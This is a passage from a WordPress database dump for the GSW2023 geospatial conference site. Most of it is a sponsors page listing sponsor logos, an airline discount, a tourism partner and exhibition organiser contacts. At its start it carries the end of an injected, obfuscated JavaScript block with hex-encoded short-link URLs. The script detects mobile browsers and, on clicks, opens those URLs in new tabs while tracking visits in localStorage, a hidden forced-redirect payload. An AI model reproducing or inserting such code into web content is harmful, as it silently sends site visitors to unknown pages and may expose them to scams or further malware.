_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 03:03:30','2023-08-16 03:03:30','',3066,'https://gsw2023.com/?p=5281',0,'revision','',0),
(5282,1,'2023-08-16 03:04:23','2023-08-16 03:04:23','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154941926{margin-top: 85px !important;margin-right: -85px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692154953581{margin-left: -85px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px 